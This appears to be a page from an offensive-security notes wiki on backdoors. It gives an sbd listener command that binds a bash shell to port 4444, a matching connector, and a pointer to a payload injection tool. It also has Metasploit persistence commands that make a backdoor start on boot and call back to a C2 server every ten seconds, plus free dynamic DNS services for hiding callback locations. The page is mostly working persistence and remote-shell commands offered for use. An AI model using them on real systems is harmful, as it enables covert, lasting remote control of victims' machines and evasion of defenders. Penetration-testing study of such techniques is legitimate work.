Page cover

Backdoors

Other than the use of typical shells like those found in "Initial Access" Secure Backdoor This is a Ncat clone that works with unix and win32. Can also use encryption and whitelists Listener #sbd -l -p 4444 -e bash -v -n Connector #sbd 192.168.1.202 4444 Backdoor Factory: Payload injection tool https://github.com/secretsquirrel/the-backdoor-factory MSF: Steps: 1) Upload back door 2) Have it reach out in some fixed interval 3) Add to boot programs (win reg, services, schedules, init.d, rc.local) Via MSF(win): meterpreter> run persistence -h -A Auto start multi/handler -X Auto start backdoor on boot -i interval to retry egress shell(seconds) -p port to reach out to -r IP of c2 server meterpreter> run persistence -A -X -i 10 -p 8080 -r 192.168.13.12 //once we have this all we need to do to reconnect is start the handler and wait 10 seconds. Free DNS services for backdoors: We use these rather than IPs so we can be dynamic with our call out location. https://www.zoneedit.com/dynamic-dns/ https://freedns.afraid.org/ http://xname.org/

Last updated

Was this helpful?